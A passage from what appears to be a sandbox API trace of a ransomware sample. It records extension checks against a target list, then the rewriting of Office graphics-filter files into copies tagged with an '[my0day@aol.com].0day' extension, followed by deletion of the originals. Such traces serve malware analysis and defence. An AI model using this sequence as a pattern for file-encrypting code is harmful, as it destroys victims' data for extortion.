(lpString1=".jpg", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.533] lstrlenW (lpString=".doc") returned 4 [0052.533] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString=".docx") returned 5 [0052.533] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0052.533] lstrlenW (lpString=".pdf") returned 4 [0052.533] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString=".xls") returned 4 [0052.533] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString=".xlsx") returned 5 [0052.533] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0052.533] lstrlenW (lpString=".ppt") returned 4 [0052.533] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.533] lstrlenW (lpString=".zip") returned 4 [0052.533] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString=".rar") returned 4 [0052.533] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString=".bz2") returned 4 [0052.533] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0052.533] lstrlenW (lpString=".7z") returned 3 [0052.533] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.534] lstrlenW (lpString=".dbf") returned 4 [0052.534] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.534] lstrlenW (lpString=".1cd") returned 4 [0052.534] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.534] lstrlenW (lpString=".jpg") returned 4 [0052.534] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0052.534] lstrcmpiW (lpString1=".WPG", lpString2=".0day") returned 1 [0052.534] lstrlenW (lpString="MS.WPG") returned 6 [0052.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.534] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1382) returned 1 [0052.534] CloseHandle (hObject=0x1d8) returned 1 [0052.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 0x20 [0052.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.534] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.535] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.535] GetLastError () returned 0x0 [0052.535] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x566, lpOverlapped=0x0) returned 1 [0052.540] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x570, lpOverlapped=0x0) returned 1 [0052.540] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.541] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0052.541] SetEndOfFile (hFile=0x190) returned 1 [0052.541] CloseHandle (hObject=0x190) returned 1 [0052.541] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.541] SetEndOfFile (hFile=0x1d8) returned 1 [0052.542] CloseHandle (hObject=0x1d8) returned 1 [0052.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.542] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 1 [0052.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.542] lstrlenW (lpString=".doc") returned 4 [0052.542] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0052.542] lstrlenW (lpString=".docx") returned 5 [0052.542] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0052.542] lstrlenW (lpString=".pdf") returned 4 [0052.542] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0052.542] lstrlenW (lpString=".xls") returned 4 [0052.542] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0052.542] lstrlenW (lpString=".xlsx") returned 5 [0052.542] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0052.542] lstrlenW (lpString=".ppt") returned 4 [0052.542] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0052.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.542] lstrlenW (lpString=".zip") returned 4 [0052.543] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0052.543] lstrlenW (lpString=".rar") returned 4 [0052.543] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString=".bz2") returned 4 [0052.543] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString=".7z") returned 3 [0052.543] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0052.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.543] lstrlenW (lpString=".dbf") returned 4 [0052.543] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.543] lstrlenW (lpString=".1cd") returned 4 [0052.543] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.543] lstrlenW (lpString=".jpg") returned 4 [0052.543] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.543] lstrlenW (lpString=".doc") returned 4 [0052.543] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString=".docx") returned 5 [0052.543] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0052.543] lstrlenW (lpString=".pdf") returned 4 [0052.543] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString=".xls") returned 4 [0052.543] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0052.543] lstrlenW (lpString=".xlsx") returned 5 [0052.543] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0052.543] lstrlenW (lpString=".ppt") returned 4 [0052.543] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0052.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.543] lstrlenW (lpString=".zip") returned 4 [0052.543] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0052.544] lstrlenW (lpString=".rar") returned 4 [0052.544] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0052.544] lstrlenW (lpString=".bz2") returned 4 [0052.544] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0052.544] lstrlenW (lpString=".7z") returned 3 [0052.544] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0052.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.544] lstrlenW (lpString=".dbf") returned 4 [0052.544] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0052.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.544] lstrlenW (lpString=".1cd") returned 4 [0052.544] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0052.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.544] lstrlenW (lpString=".jpg") returned 4 [0052.544] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0052.544] lstrcmpiW (lpString1=".FLT", lpString2=".0day") returned 1 [0052.544] lstrlenW (lpString="PICTIM32.FLT") returned 12 [0052.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.544] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=73080) returned 1 [0052.544] CloseHandle (hObject=0x1d8) returned 1 [0052.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 0x20 [0052.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.545] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.545] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.545] GetLastError () returned 0x0 [0052.545] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x11d78, lpOverlapped=0x0) returned 1 [0052.549] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x11d80, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x11d80, lpOverlapped=0x0) returned 1 [0052.551] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.551] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.551] SetEndOfFile (hFile=0x190) returned 1 [0052.551] CloseHandle (hObject=0x190) returned 1 [0052.551] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.551] SetEndOfFile (hFile=0x1d8) returned 1 [0052.553] CloseHandle (hObject=0x1d8) returned 1 [0052.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.553] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 1 [0052.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.553] lstrlenW (lpString=".doc") returned 4 [0052.553] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.553] lstrlenW (lpString=".docx") returned 5 [0052.553] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.553] lstrlenW (lpString=".pdf") returned 4 [0052.553] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.553] lstrlenW (lpString=".xls") returned 4 [0052.553] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.553] lstrlenW (lpString=".xlsx") returned 5 [0052.553] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.553] lstrlenW (lpString=".ppt") returned 4 [0052.553] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.553] lstrlenW (lpString=".zip") returned 4 [0052.553] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.553] lstrlenW (lpString=".rar") returned 4 [0052.554] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.554] lstrlenW (lpString=".bz2") returned 4 [0052.554] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.554] lstrlenW (lpString=".7z") returned 3 [0052.554] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.554] lstrlenW (lpString=".dbf") returned 4 [0052.554] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.554] lstrlenW (lpString=".1cd") returned 4 [0052.554] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.554] lstrlenW (lpString=".jpg") returned 4 [0052.554] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.554] lstrlenW (lpString=".doc") returned 4 [0052.554] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.554] lstrlenW (lpString=".docx") returned 5 [0052.554] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.554] lstrlenW (lpString=".pdf") returned 4 [0052.554] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.554] lstrlenW (lpString=".xls") returned 4 [0052.554] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.554] lstrlenW (lpString=".xlsx") returned 5 [0052.554] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.554] lstrlenW (lpString=".ppt") returned 4 [0052.554] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.554] lstrlenW (lpString=".zip") returned 4 [0052.554] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.554] lstrlenW (lpString=".rar") returned 4 [0052.554] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.555] lstrlenW (lpString=".bz2") returned 4 [0052.649] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.649] lstrlenW (lpString=".7z") returned 3 [0052.649] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.649] lstrlenW (lpString=".dbf") returned 4 [0052.649] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.649] lstrlenW (lpString=".1cd") returned 4 [0052.649] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.649] lstrlenW (lpString=".jpg") returned 4 [0052.649] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.650] lstrcmpiW (lpString1=".FLT", lpString2=".0day") returned 1 [0052.650] lstrlenW (lpString="WPGIMP32.FLT") returned 12 [0052.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.103] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=280448) returned 1 [0054.103] CloseHandle (hObject=0x234) returned 1 [0054.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 0x20 [0054.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.103] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.103] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0054.104] GetLastError () returned 0x0 [0054.104] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x44780, lpOverlapped=0x0) returned 1 [0054.111] WriteFile (in: hFile=0x238, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x44790, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x44790, lpOverlapped=0x0) returned 1 [0054.116] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.116] WriteFile (in: hFile=0x238, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.116] SetEndOfFile (hFile=0x238) returned 1 [0054.116] CloseHandle (hObject=0x238) returned 1 [0054.116] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.116] SetEndOfFile (hFile=0x234) returned 1 [0054.119] CloseHandle (hObject=0x234) returned 1 [0054.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.119] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 1 [0054.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.119] lstrlenW (lpString=".doc") returned 4 [0054.119] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0054.119] lstrlenW (lpString=".docx") returned 5 [0054.119] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0054.119] lstrlenW (lpString=".pdf") returned 4 [0054.119] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0054.119] lstrlenW (lpString=".xls") returned 4 [0054.120] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0054.120] lstrlenW (lpString=".xlsx") returned 5 [0054.120] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0054.120] lstrlenW (lpString=".ppt") returned 4 [0054.120] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0054.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.120] lstrlenW (lpString=".zip") returned 4 [0054.120] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0054.120] lstrlenW (lpString=".rar") returned 4 [0054.120] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0054.120] lstrlenW (lpString=".bz2") returned 4 [0054.120] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0054.120] lstrlenW (lpString=".7z") returned 3 [0054.120] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0054.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.120] lstrlenW (lpString=".dbf") returned 4 [0054.120] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0054.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.120] lstrlenW (lpString=".1cd") returned 4 [0054.120] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0054.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.120] lstrlenW (lpString=".jpg") returned 4 [0054.120] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.120] lstrlenW (lpString=".doc") returned 4 [0054.120] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0054.120] lstrlenW (lpString=".docx") returned 5 [0054.120] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0054.120] lstrlenW (lpString=".pdf") returned 4 [0054.120] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0054.120] lstrlenW (lpString=".xls") returned 4 [0054.121] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0054.121] lstrlenW (lpString=".xlsx") returned 5 [0054.121] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0054.121] lstrlenW (lpString=".ppt") returned 4 